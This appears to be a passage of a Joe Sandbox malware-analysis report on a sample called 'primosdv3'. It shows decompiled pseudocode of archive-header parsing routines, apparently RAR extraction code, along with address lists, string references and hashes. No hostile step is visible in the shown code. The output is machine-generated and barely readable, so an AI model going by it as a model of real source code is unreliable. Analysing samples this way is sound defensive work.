				signed int _t350;
				signed char _t352;
				unsigned int _t363;
				intOrPtr _t370;
				void* _t373;
				intOrPtr _t374;
				void* _t381;
				signed int _t383;
				void* _t384;
				signed int _t395;
				intOrPtr* _t399;
				signed int _t414;
				signed int _t423;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				signed int _t502;
				signed char _t503;
				signed int _t504;
				unsigned int _t505;
				intOrPtr _t514;
				void* _t515;
				void* _t522;
				signed int _t525;
				void* _t526;
				signed int _t536;
				void* _t542;
				void* _t544;
				intOrPtr _t547;
				void* _t548;
				void* _t550;
				void* _t551;
				intOrPtr _t561;

				_t551 = _t550 - 0x68;
				E00C7EB78(0xc926be, _t548);
				E00C7EC50(0x2068);
				_t399 = __ecx;
				E00C6CB83(_t548 + 0x30, __ecx);
				 *(_t548 + 0x64) = 0;
				 *((intOrPtr*)(_t548 - 4)) = 0;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L18:
					 *((char*)(_t548 + 0x6a)) = 0;
					L19:
					_push(7);
					_t237 = E00C6CD8A();
					__eflags = _t237 - 7;
					if(_t237 >= 7) {
						 *(_t399 + 0x220c) = 0;
						 *(_t399 + 0x21fc) = E00C6CBFB(_t548 + 0x30);
						_t536 = E00C6CD66(_t548 + 0x30, 4);
						_t240 = E00C6CCFB();
						__eflags = _t240 | _t500;
						if((_t240 | _t500) == 0) {
							L88:
							E00C620D7(_t399);
							L89:
							E00C615FB(_t548 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t548 - 0xc));
							return  *(_t548 + 0x64);
						}
						__eflags = _t536;
						if(_t536 == 0) {
							goto L88;
						}
						_t46 = _t536 + 4; // 0x4
						_t47 = _t536 - 3; // -3
						_t514 = _t46 + _t240;
						_t414 = _t47 + _t240;
						__eflags = _t414;
						if(_t414 < 0) {
							goto L88;
						}
						__eflags = _t514 - 7;
						if(_t514 < 7) {
							goto L88;
						}
						_push(_t414);
						E00C6CD8A();
						__eflags =  *(_t548 + 0x48) - _t514;
						if( *(_t548 + 0x48) < _t514) {
							goto L20;
						}
						_t246 = E00C6CCDB(_t548 + 0x30);
						 *(_t399 + 0x2200) = E00C6CCFB();
						_t248 = E00C6CCFB();
						 *(_t399 + 0x2204) = _t248;
						 *((intOrPtr*)(_t399 + 0x2208)) = _t514;
						_t515 = _t399 + 0x21fc;
						 *(_t399 + 0x220c) = _t248 >> 0x00000002 & 0x00000001;
						__eflags =  *_t515 - _t246;
						 *(_t399 + 0x21f4) =  *(_t399 + 0x2200);
						_t60 = _t548 + 0x6b;
						 *_t60 =  *_t515 != _t246;
						__eflags =  *_t60;
						if( *_t60 == 0) {
							L29:
							_t252 = 0;
							__eflags =  *(_t399 + 0x2204) & 0x00000001;
							 *(_t548 + 0x58) = 0;
							 *(_t548 + 0x54) = 0;
							if(( *(_t399 + 0x2204) & 0x00000001) == 0) {
								L33:
								__eflags =  *(_t399 + 0x2204) & 0x00000002;
								_t539 = _t252;
								 *(_t548 + 0x60) = _t252;
								 *(_t548 + 0x5c) = _t252;
								if(( *(_t399 + 0x2204) & 0x00000002) != 0) {
									_t363 = E00C6CCFB();
									_t539 = _t363;
									 *(_t548 + 0x60) = _t363;
									 *(_t548 + 0x5c) = _t500;
								}
								_t253 = E00C61983(_t399,  *((intOrPtr*)(_t399 + 0x2208)));
								asm("adc ecx, edx");
								 *((intOrPtr*)(_t399 + 0x6cc0)) = E00C63EFB(_t253 +  *((intOrPtr*)(_t399 + 0x6cb8)),  *((intOrPtr*)(_t399 + 0x6cbc)), _t539,  *(_t548 + 0x5c), 0, 0);
								 *((intOrPtr*)(_t399 + 0x6cc4)) = 0;
								_t502 =  *(_t399 + 0x2200);
								_t257 = _t502 - 1;
								__eflags = _t257;
								if(_t257 == 0) {
									E00C6AD5E(_t399 + 0x2220);
									_t423 = 5;
									memcpy(_t399 + 0x2220, _t515, _t423 << 2);
									_t503 = E00C6CCFB();
									 *(_t399 + 0x6ccd) = _t503 & 1;
									 *(_t399 + 0x6ccc) = _t503 >> 0x00000002 & 1;
									_t432 = 1;
									 *((char*)(_t399 + 0x6cd2)) = 1;
									 *(_t399 + 0x6ccf) = _t503 >> 0x00000004 & 1;
									 *(_t399 + 0x6cd3) = _t503 >> 0x00000003 & 1;
									_t269 = 0;
									 *((char*)(_t399 + 0x6cd0)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										_t504 = 0;
									} else {
										_t504 = E00C6CCFB();
										_t269 = 0;
										_t432 = 1;
									}
									 *(_t399 + 0x6cf0) = _t504;
									__eflags =  *(_t399 + 0x6ccd);
									if( *(_t399 + 0x6ccd) == 0) {
										L84:
										_t432 = _t269;
										goto L85;
									} else {
										__eflags = _t504;
										if(_t504 == 0) {
											L85:
											 *((char*)(_t399 + 0x6cd1)) = _t432;
											_t433 =  *(_t548 + 0x58);
											__eflags = _t433 |  *(_t548 + 0x54);
											if((_t433 |  *(_t548 + 0x54)) != 0) {
												E00C62210(_t399, _t504, _t548 + 0x30, _t433, _t399 + 0x2220);
											}
											goto L87;
										}
										goto L84;
									}
								} else {
									_t277 = _t257 - 1;
									__eflags = _t277;
									if(_t277 == 0) {
										L49:
										__eflags = _t502 - 2;
										_t121 = (0 | _t502 == 0x00000002) - 1; // -1
										_t522 = (_t121 & 0x00002350) + 0x2298 + _t399;
										 *(_t548 + 0x2c) = _t522;
										E00C6ACC4(_t522, 0);
										_t438 = 5;
										memcpy(_t522, _t399 + 0x21fc, _t438 << 2);
										_t542 =  *(_t548 + 0x2c);
										 *(_t548 + 0x64) =  *(_t399 + 0x2200);
										 *(_t542 + 0x1058) =  *(_t548 + 0x60);
										 *((char*)(_t542 + 0x10f9)) = 1;
										 *(_t542 + 0x105c) =  *(_t548 + 0x5c);
										 *(_t542 + 0x1094) = E00C6CCFB();
										 *(_t542 + 0x1060) = E00C6CCFB();
										_t289 =  *(_t542 + 0x1094) >> 0x00000003 & 0x00000001;
										__eflags = _t289;
										 *(_t542 + 0x1064) = _t502;
										 *(_t542 + 0x109a) = _t289;
										if(_t289 != 0) {
											 *(_t542 + 0x1060) = 0x7fffffff;
											 *(_t542 + 0x1064) = 0x7fffffff;
										}
										_t442 =  *(_t542 + 0x105c);
										_t525 =  *(_t542 + 0x1064);
										_t290 =  *(_t542 + 0x1058);
										_t505 =  *(_t542 + 0x1060);
										__eflags = _t442 - _t525;
										if(__eflags < 0) {
											L54:
											_t290 = _t505;
											_t442 = _t525;
											goto L55;
										} else {
											if(__eflags > 0) {
												L55:
												 *(_t542 + 0x106c) = _t442;
												 *(_t542 + 0x1068) = _t290;
												_t291 = E00C6CCFB();
												__eflags =  *(_t542 + 0x1094) & 0x00000002;
												 *((intOrPtr*)(_t542 + 0x24)) = _t291;
												if(( *(_t542 + 0x1094) & 0x00000002) != 0) {
													E00C7158F(_t542 + 0x1040, E00C6CBFB(_t548 + 0x30), 0);
												}
												 *(_t542 + 0x1070) =  *(_t542 + 0x1070) & 0x00000000;
												__eflags =  *(_t542 + 0x1094) & 0x00000004;
												if(( *(_t542 + 0x1094) & 0x00000004) != 0) {
													 *(_t542 + 0x1070) = 2;
													 *((intOrPtr*)(_t542 + 0x1074)) = E00C6CBFB(_t548 + 0x30);
												}
												 *(_t542 + 0x1100) =  *(_t542 + 0x1100) & 0x00000000;
												_t292 = E00C6CCFB();
												 *(_t548 + 0x60) = _t292;
												 *(_t542 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
												_t450 = (_t292 & 0x0000003f) + 0x32;
												 *((intOrPtr*)(_t542 + 0x1c)) = _t450;
												__eflags = _t450 - 0x32;
												if(_t450 != 0x32) {
													 *((intOrPtr*)(_t542 + 0x1c)) = 0x270f;
												}
												 *((char*)(_t542 + 0x18)) = E00C6CCFB();
												_t526 = E00C6CCFB();
												 *(_t542 + 0x10fc) = 2;
												_t295 =  *((intOrPtr*)(_t542 + 0x18));
												 *(_t542 + 0x10f8) =  *(_t399 + 0x2204) >> 0x00000006 & 1;
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295;
													if(_t295 == 0) {
														_t178 = _t542 + 0x10fc;
														 *_t178 =  *(_t542 + 0x10fc) & 0x00000000;
														__eflags =  *_t178;
													}
												} else {
													 *(_t542 + 0x10fc) = 1;
												}
												_t456 =  *(_t542 + 8);
												 *(_t542 + 0x1098) = _t456 >> 0x00000003 & 1;
												 *(_t542 + 0x10fa) = _t456 >> 0x00000005 & 1;
												__eflags =  *(_t548 + 0x64) - 2;
												_t459 =  *(_t548 + 0x60);
												 *(_t542 + 0x1099) = _t456 >> 0x00000004 & 1;
												if( *(_t548 + 0x64) != 2) {
													L68:
													_t302 = 0;
													__eflags = 0;
													goto L69;
												} else {
													__eflags = _t459 & 0x00000040;
													if((_t459 & 0x00000040) == 0) {
														goto L68;
													}
													_t302 = 1;
													L69:
													 *((char*)(_t542 + 0x10f0)) = _t302;
													_t304 =  *(_t542 + 0x1094) & 1;
													 *(_t542 + 0x10f1) = _t304;
													_t509 = 0x20000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t459 >> 0x0000000a & 0x0000000f);
													asm("sbb eax, eax");
													 *(_t542 + 0x109c) =  ~( *(_t542 + 0x109b) & 0x000000ff) & 0x00000005;
													__eflags = _t526 - 0x1fff;
													if(_t526 >= 0x1fff) {
														_t526 = 0x1fff;
													}
													E00C6CC5D(_t548 + 0x30, _t548 - 0x2074, _t526);
													 *((char*)(_t548 + _t526 - 0x2074)) = 0;
													_push(0x800);
													_t527 = _t542 + 0x28;
													_push(_t542 + 0x28);
													_push(_t548 - 0x2074);
													E00C71C3B();
													_t463 =  *(_t548 + 0x58);
													_t318 = _t463 |  *(_t548 + 0x54);
													__eflags = _t463 |  *(_t548 + 0x54);
													if((_t463 |  *(_t548 + 0x54)) != 0) {
														_t318 = E00C62210(_t399, _t509, _t548 + 0x30, _t463, _t542);
													}
													__eflags =  *(_t548 + 0x64) - 2;
													if( *(_t548 + 0x64) != 2) {
														_t319 = E00C83E49(_t318, _t527, L"CMT");
														__eflags = _t319;
														if(_t319 == 0) {
															 *((char*)(_t399 + 0x6cce)) = 1;
														}
													} else {
														E00C62134(_t399, _t542);
													}
													__eflags =  *(_t548 + 0x6b);
													if(__eflags != 0) {
														E00C62021(__eflags, 0x1c, _t399 + 0x32, _t527);
													}
													L87:
													 *(_t548 + 0x64) =  *(_t548 + 0x48);
													goto L89;
												}
											}
											__eflags = _t290 - _t505;
											if(_t290 > _t505) {
												goto L55;
											}
											goto L54;
										}
									}
									_t328 = _t277 - 1;
									__eflags = _t328;
									if(_t328 == 0) {
										goto L49;
									}
									_t329 = _t328 - 1;
									__eflags = _t329;
									if(_t329 == 0) {
										_t471 = 5;
										memcpy(_t399 + 0x2260, _t399 + 0x21fc, _t471 << 2);
										_t331 = E00C6CCFB();
										__eflags = _t331;
										if(_t331 == 0) {
											 *(_t399 + 0x2274) = E00C6CCFB() & 0x00000001;
											_t335 = E00C6CBAF(_t548 + 0x30) & 0x000000ff;
											 *(_t399 + 0x2278) = _t335;
											__eflags = _t335 - 0x18;
											if(_t335 <= 0x18) {
												E00C6CC5D(_t548 + 0x30, _t399 + 0x227c, 0x10);
												__eflags =  *(_t399 + 0x2274);
												if( *(_t399 + 0x2274) != 0) {
													_t544 = _t399 + 0x228c;
													E00C6CC5D(_t548 + 0x30, _t544, 8);
													E00C6CC5D(_t548 + 0x30, _t548 + 0x64, 4);
													E00C70016(_t548 - 0x74);
													_push(8);
													_push(_t544);
													_push(_t548 - 0x74);
													E00C7005C();
													_push(_t548 + 8);
													E00C6FF33(_t548 - 0x74);
													_t350 = E00C80C4A(_t548 + 0x64, _t548 + 8, 4);
													asm("sbb al, al");
													_t352 =  ~_t350 + 1;
													__eflags = _t352;
													 *(_t399 + 0x2274) = _t352;
												}
												 *((char*)(_t399 + 0x6cd4)) = 1;
												goto L87;
											}
											_push(_t335);
											_push(L"hc%u");
											L43:
											_push(0x14);
											_push(_t548);
											E00C64092();
											E00C6403D(_t399, _t399 + 0x32, _t548);
											goto L89;
										}
										_push(_t331);
										_push(L"h%u");
										goto L43;
									}
									__eflags = _t329 == 1;
									if(_t329 == 1) {
										_t480 = 5;
										memcpy(_t399 + 0x45a8, _t399 + 0x21fc, _t480 << 2);
										 *(_t399 + 0x45c4) = E00C6CCFB() & 0x00000001;
										 *((short*)(_t399 + 0x45c6)) = 0;
										 *((char*)(_t399 + 0x45c5)) = 0;
									}
									goto L87;
								}
							}
							_t485 = E00C6CCFB();
							 *(_t548 + 0x54) = _t500;
							_t252 = 0;
							 *(_t548 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L33;
							}
							if(__eflags > 0) {
								goto L88;
							}
							__eflags = _t485 -  *((intOrPtr*)(_t399 + 0x2208));
							if(_t485 >=  *((intOrPtr*)(_t399 + 0x2208))) {
								goto L88;
							}
							goto L33;
						}
						E00C620D7(_t399);
						 *((char*)(_t399 + 0x6cdc)) = 1;
						E00C66D83(0xca1098, 3);
						__eflags =  *((char*)(_t548 + 0x6a));
						if(__eflags == 0) {
							goto L29;
						} else {
							E00C62021(__eflags, 4, _t399 + 0x32, _t399 + 0x32);
							L6:
							 *((char*)(_t399 + 0x6cdd)) = 1;
							goto L89;
						}
					}
					L20:
					E00C63FFC(_t399, _t500);
					goto L89;
				}
				_t500 =  *((intOrPtr*)(__ecx + 0x6cd8)) + 8;
				asm("adc eax, ecx");
				_t561 =  *((intOrPtr*)(__ecx + 0x6cbc));
				if(_t561 < 0 || _t561 <= 0 &&  *((intOrPtr*)(__ecx + 0x6cb8)) <= _t500) {
					goto L18;
				} else {
					_t370 =  *((intOrPtr*)(_t399 + 0x21d4));
					 *((char*)(_t548 + 0x6a)) = 1;
					_t563 =  *((intOrPtr*)(_t370 + 0x6127));
					if( *((intOrPtr*)(_t370 + 0x6127)) == 0) {
						 *0xc93278(_t548 + 0x18, 0x10);
						_t373 =  *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xc))))();
						__eflags = _t373 - 0x10;
						if(_t373 != 0x10) {
							goto L20;
						}
						_t374 =  *((intOrPtr*)(_t399 + 0x21d4));
						__eflags =  *((char*)(_t374 + 0x6124));
						if( *((char*)(_t374 + 0x6124)) != 0) {
							L10:
							 *(_t548 + 0x6b) = 1;
							L11:
							E00C63E6D(_t399);
							_t534 = _t399 + 0x227c;
							_t547 = _t399 + 0x1038;
							E00C6603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t399 + 0x227c, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
							__eflags =  *(_t399 + 0x2274);
							if( *(_t399 + 0x2274) == 0) {
								L16:
								 *((intOrPtr*)(_t548 + 0x50)) = _t547;
								goto L19;
							} else {
								_t381 = _t399 + 0x228c;
								while(1) {
									_t383 = E00C80C4A(_t548 + 0x28, _t381, 8);
									_t551 = _t551 + 0xc;
									__eflags = _t383;
									if(_t383 == 0) {
										goto L16;
									}
									__eflags =  *(_t548 + 0x6b);
									_t384 = _t399 + 0x32;
									_push(_t384);
									_push(_t384);
									if(__eflags != 0) {
										_push(6);
										E00C62021(__eflags);
										 *((char*)(_t399 + 0x6cdd)) = 1;
										E00C66D83(0xca1098, 0xb);
										goto L89;
									}
									_push(0x83);
									E00C62021(__eflags);
									E00C6F279( *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024);
									E00C63E6D(_t399);
									E00C6603A(_t547, 0, 5,  *((intOrPtr*)(_t399 + 0x21d4)) + 0x6024, _t534, _t548 + 0x18,  *(_t399 + 0x2278), 0, _t548 + 0x28);
									__eflags =  *(_t399 + 0x2274);
									_t381 = _t399 + 0x228c;
									if( *(_t399 + 0x2274) != 0) {
										continue;
									}
									goto L16;
								}
								goto L16;
							}
						}
						_t395 = E00C71B63();
						 *(_t548 + 0x6b) = 0;
						__eflags = _t395;
						if(_t395 == 0) {
							goto L11;
						}
						goto L10;
					} else {
						E00C6138B(_t563, 0x7f, _t399 + 0x32);
						goto L6;
					}
				}
			}

0x00c632f8
0x00c63300
0x00c6330a
0x00c63311
0x00c63318
0x00c6331f
0x00c63322
0x00c6332b
0x00c634a6
0x00c634a6
0x00c634a9
0x00c634a9
0x00c634ae
0x00c634b3
0x00c634b6
0x00c634c7
0x00c634d8
0x00c634e6
0x00c634e8
0x00c634ef
0x00c634f1
0x00c63b09
0x00c63b0b
0x00c63b10
0x00c63b13
0x00c63b21
0x00c63b2c
0x00c63b2c
0x00c634f7
0x00c634f9
0x00000000
0x00000000
0x00c634ff
0x00c63502
0x00c63505
0x00c63507
0x00c63507
0x00c63509
0x00000000
0x00000000
0x00c6350f
0x00c63512
0x00000000
0x00000000
0x00c63518
0x00c6351c
0x00c63521
0x00c63524
0x00000000
0x00000000
0x00c63529
0x00c6353b
0x00c63541
0x00c63546
0x00c63551
0x00c63557
0x00c6355d
0x00c63563
0x00c6356b
0x00c63571
0x00c63571
0x00c63571
0x00c63575
0x00c635a8
0x00c635a8
0x00c635aa
0x00c635b1
0x00c635b4
0x00c635b7
0x00c635e1
0x00c635e1
0x00c635e8
0x00c635ea
0x00c635ed
0x00c635f0
0x00c635f5
0x00c635fa
0x00c635fc
0x00c635ff
0x00c635ff
0x00c6360a
0x00c63622
0x00c6362c
0x00c63632
0x00c63638
0x00c63640
0x00c63640
0x00c63643
0x00c63a50
0x00c63a5f
0x00c63a60
0x00c63a6a
0x00c63a73
0x00c63a85
0x00c63a8d
0x00c63a90
0x00c63a96
0x00c63aa3
0x00c63aa9
0x00c63aab
0x00c63ab1
0x00c63ab4
0x00c63ac7
0x00c63ab6
0x00c63abe
0x00c63ac2
0x00c63ac4
0x00c63ac4
0x00c63ac9
0x00c63acf
0x00c63ad6
0x00c63adc
0x00c63adc
0x00000000
0x00c63ad8
0x00c63ad8
0x00c63ada
0x00c63ade
0x00c63ade
0x00c63ae4
0x00c63ae9
0x00c63aec
0x00c63afc
0x00c63afc
0x00000000
0x00c63aec
0x00000000
0x00c63ada
0x00c63649
0x00c63649
0x00c63649
0x00c6364c
0x00c63796
0x00c63798
0x00c637a0
0x00c637af
0x00c637b3
0x00c637b6
0x00c637bd
0x00c637c4
0x00c637cf
0x00c637d2
0x00c637d8
0x00c637e1
0x00c637e8
0x00c637f6
0x00c63801
0x00c63810
0x00c63810
0x00c63812
0x00c63818
0x00c6381e
0x00c63825
0x00c6382b
0x00c6382b
0x00c63831
0x00c63837
0x00c6383d
0x00c63843
0x00c63849
0x00c6384b
0x00c63853
0x00c63853
0x00c63855
0x00000000
0x00c6384d
0x00c6384d
0x00c63857
0x00c63857
0x00c63860
0x00c63866
0x00c6386b
0x00c63872
0x00c63875
0x00c63888
0x00c63888
0x00c6388d
0x00c63894
0x00c6389b
0x00c638a0
0x00c638af
0x00c638af
0x00c638b5
0x00c638bf
0x00c638c6
0x00c638cf
0x00c638d7
0x00c638da
0x00c638dd
0x00c638e0
0x00c638e2
0x00c638e2
0x00c638f4
0x00c63908
0x00c6390a
0x00c63914
0x00c63919
0x00c6391f
0x00c63921
0x00c6392b
0x00c6392d
0x00c6392f
0x00c6392f
0x00c6392f
0x00c6392f
0x00c63923
0x00c63923
0x00c63923
0x00c63936
0x00c63940
0x00c63952
0x00c63958
0x00c6395c
0x00c6395f
0x00c63965
0x00c63970
0x00c63970
0x00c63970
0x00000000
0x00c63967
0x00c63967
0x00c6396a
0x00000000
0x00000000
0x00c6396c
0x00c63972
0x00c63972
0x00c6397e
0x00c63983
0x00c63994
0x00c63998
0x00c6399e
0x00c639ad
0x00c639b2
0x00c639bd
0x00c639bf
0x00c639c1
0x00c639c1
0x00c639ce
0x00c639d3
0x00c639e1
0x00c639e6
0x00c639e9
0x00c639ea
0x00c639eb
0x00c639f0
0x00c639f5
0x00c639f5
0x00c639f8
0x00c63a02
0x00c63a02
0x00c63a07
0x00c63a0b
0x00c63a1d
0x00c63a24
0x00c63a26
0x00c63a28
0x00c63a28
0x00c63a0d
0x00c63a10
0x00c63a10
0x00c63a2f
0x00c63a33
0x00c63a40
0x00c63a40
0x00c63b01
0x00c63b04
0x00000000
0x00c63b04
0x00c63965
0x00c6384f
0x00c63851
0x00000000
0x00000000
0x00000000
0x00c63851
0x00c6384b
0x00c63652
0x00c63652
0x00c63655
0x00000000
0x00000000
0x00c6365b
0x00c6365b
0x00c6365e
0x00c636a0
0x00c636ad
0x00c636b2
0x00c636b7
0x00c636b9
0x00c636f0
0x00c636fb
0x00c636fe
0x00c63704
0x00c63707
0x00c6371d
0x00c63722
0x00c63729
0x00c6372d
0x00c63737
0x00c63745
0x00c6374e
0x00c63753
0x00c63755
0x00c63759
0x00c6375a
0x00c63762
0x00c63767
0x00c63776
0x00c63780
0x00c63782
0x00c63782
0x00c63784
0x00c63784
0x00c6378a
0x00000000
0x00c6378a
0x00c63709
0x00c6370a
0x00c636c1
0x00c636c4
0x00c636c6
0x00c636c7
0x00c636d9
0x00000000
0x00c636d9
0x00c636bb
0x00c636bc
0x00000000
0x00c636bc
0x00c63660
0x00c63663
0x00c6366b
0x00c63678
0x00c63684
0x00c6368c
0x00c63693
0x00c63693
0x00000000
0x00c63663
0x00c63643
0x00c635c1
0x00c635c3
0x00c635c6
0x00c635c8
0x00c635cb
0x00c635cd
0x00000000
0x00000000
0x00c635cf
0x00000000
0x00000000
0x00c635d5
0x00c635db
0x00000000
0x00000000
0x00000000
0x00c635db
0x00c63579
0x00c63585
0x00c6358c
0x00c63591
0x00c63595
0x00000000
0x00c63597
0x00c6359e
0x00c63375
0x00c63375
0x00000000
0x00c63375
0x00c63595
0x00c634b8
0x00c634ba
0x00000000
0x00c634ba
0x00c63339
0x00c6333c
0x00c6333e
0x00c63344
0x00000000
0x00c63358
0x00c63358
0x00c6335e
0x00c63362
0x00c63368
0x00c6338e
0x00c63396
0x00c63398
0x00c6339b
0x00000000
0x00000000
0x00c633a1
0x00c633a7
0x00c633ae
0x00c633bd
0x00c633bd
0x00c633c1
0x00c633c3
0x00c633df
0x00c633eb
0x00c633f7
0x00c633fc
0x00c63403
0x00c63482
0x00c63482
0x00000000
0x00c63405
0x00c63405
0x00c6340b
0x00c63412
0x00c63417
0x00c6341a
0x00c6341c
0x00000000
0x00000000
0x00c6341e
0x00c63422
0x00c63425
0x00c63426
0x00c63427
0x00c63487
0x00c63489
0x00c63495
0x00c6349c
0x00000000
0x00c6349c
0x00c63429
0x00c6342e
0x00c6343f
0x00c63446
0x00c6346e
0x00c63473
0x00c6347a
0x00c63480
0x00000000
0x00000000
0x00000000
0x00c63480
0x00000000
0x00c6340b
0x00c63403
0x00c633b0
0x00c633b5
0x00c633b9
0x00c633bb
0x00000000
0x00000000
0x00000000
0x00c6336a
0x00c63370
0x00000000
0x00c63370
0x00c63368

APIs

__EH_prolog.LIBCMT ref: 00C63300
_swprintf.LIBCMT ref: 00C636C7

Strings

hc%u, xrefs: 00C6370A
h%u, xrefs: 00C636BC
CMT, xrefs: 00C63A17

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 1e0a7d83e529101ef5a37180146b8ebd4bb4afd91d962883b307d1e5ff985bbf
Instruction ID: 096f403751f8736b94bade1b675dc6ccdd98f1925c78b94717a865b1f4358567
Opcode Fuzzy Hash: 1e0a7d83e529101ef5a37180146b8ebd4bb4afd91d962883b307d1e5ff985bbf
Instruction Fuzzy Hash: 3732F471514384AFDF24DF74C8D5AEA3BA5AF54300F08447DFD9A8B282DB749A49DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00C6286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00C6286B(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				unsigned int _t329;
				signed int _t334;
				void* _t335;
				void* _t337;
				signed int _t340;
				char _t354;
				signed short _t361;
				signed int _t364;
				signed int _t371;
				signed char _t374;
				signed char _t377;
				signed int _t378;
				signed int _t395;
				signed int _t396;
				signed int _t400;
				signed char _t413;
				intOrPtr _t414;
				char _t415;
				signed int _t418;
				signed int _t419;
				signed int _t424;
				signed int _t427;
				signed int _t432;
				signed short _t437;
				signed short _t442;
				unsigned int _t447;
				signed int _t450;
				signed int _t455;
				signed int _t469;
				void* _t470;
				void* _t478;
				signed char _t484;
				signed int _t488;
				signed int _t498;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				intOrPtr* _t516;
				signed int _t520;
				signed int _t521;
				signed int _t533;
				signed int _t537;
				signed int _t539;
				unsigned int _t548;
				signed int _t550;
				signed int _t560;
				signed int _t562;
				signed int _t563;
				intOrPtr* _t585;
				void* _t593;
				signed int _t597;
				intOrPtr _t609;
				signed int _t612;
				signed int _t624;
				signed char _t628;
				void* _t639;
				signed char _t640;
				signed int _t643;
				unsigned int _t644;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				unsigned int _t653;
				signed int _t657;
				void* _t659;
				void* _t665;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed int _t672;
				void* _t673;
				signed int _t675;
				intOrPtr* _t676;
				signed int _t688;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t701;
				intOrPtr _t707;
				intOrPtr* _t708;
				intOrPtr _t718;

				E00C7EB78(0xc926a5, _t708);
				E00C7EC50(0x2024);
				_t516 = __ecx;
				 *((intOrPtr*)(_t708 + 0x14)) = __ecx;
				E00C6CB83(_t708 + 0x1c, __ecx);
				 *(_t708 + 0x10) = 0;
				 *((intOrPtr*)(_t708 - 4)) = 0;
				_t657 = 7;
				if( *((intOrPtr*)(__ecx + 0x6cd4)) == 0) {
					L7:
					 *((char*)(_t708 + 0x5a)) = 0;
					L8:
					_push(_t657);
					E00C6CD8A();
					__eflags =  *(_t708 + 0x34);
					if( *(_t708 + 0x34) == 0) {
						L5:
						E00C63FFC(_t516, _t639);
						L131:
						E00C615FB(_t708 + 0x1c);
						 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
						return  *(_t708 + 0x10);
					}
					 *(_t516 + 0x21fc) = E00C6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x220c) = 0;
					_t688 = E00C6CBAF(_t708 + 0x1c) & 0x000000ff;
					_t329 = E00C6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2204) = _t329;
					 *(_t516 + 0x220c) = _t329 >> 0x0000000e & 0x00000001;
					_t533 = E00C6CBC6(_t708 + 0x1c) & 0x0000ffff;
					 *(_t516 + 0x2208) = _t533;
					 *(_t516 + 0x2200) = _t688;
					__eflags = _t533 - _t657;
					if(_t533 >= _t657) {
						_t640 = 2;
						_t334 = _t688 - 0x73;
						__eflags = _t334;
						if(_t334 == 0) {
							 *(_t516 + 0x2200) = 1;
							_t688 = 1;
							__eflags = 1;
							L20:
							 *(_t516 + 0x21f4) = _t688;
							__eflags = _t688 - 0x75;
							if(_t688 == 0x75) {
								L23:
								_t335 = 6;
								L25:
								_push(_t335);
								E00C6CD8A();
								_t337 = E00C61983(_t516,  *(_t516 + 0x2208));
								asm("adc ecx, 0x0");
								 *((intOrPtr*)(_t516 + 0x6cc0)) = _t337 +  *((intOrPtr*)(_t516 + 0x6cb8));
								 *(_t516 + 0x6cc4) =  *(_t516 + 0x6cbc);
								_t537 =  *(_t516 + 0x2200);
								 *(_t708 + 0x18) = _t537;
								_t340 = _t537 - 1;
								__eflags = _t340;
								if(_t340 == 0) {
									_t659 = _t516 + 0x2220;
									E00C6AD5E(_t659);
									_t539 = 5;
									memcpy(_t659, _t516 + 0x21fc, _t539 << 2);
									 *(_t516 + 0x2234) = E00C6CBC6(_t708 + 0x1c);
									_t640 = E00C6CBFB(_t708 + 0x1c);
									 *(_t516 + 0x2238) = _t640;
									 *(_t516 + 0x6ccd) =  *(_t516 + 0x2228) & 0x00000001;
									 *(_t516 + 0x6ccc) =  *(_t516 + 0x2228) >> 0x00000003 & 0x00000001;
									_t548 =  *(_t516 + 0x2228);
									 *(_t516 + 0x6ccf) = _t548 >> 0x00000002 & 0x00000001;
									 *(_t516 + 0x6cd3) = _t548 >> 0x00000006 & 0x00000001;
									 *(_t516 + 0x6cd4) = _t548 >> 0x00000007 & 0x00000001;
									__eflags = _t640;
									if(_t640 != 0) {
										L117:
										_t354 = 1;
										L118:
										 *((char*)(_t516 + 0x6cd0)) = _t354;
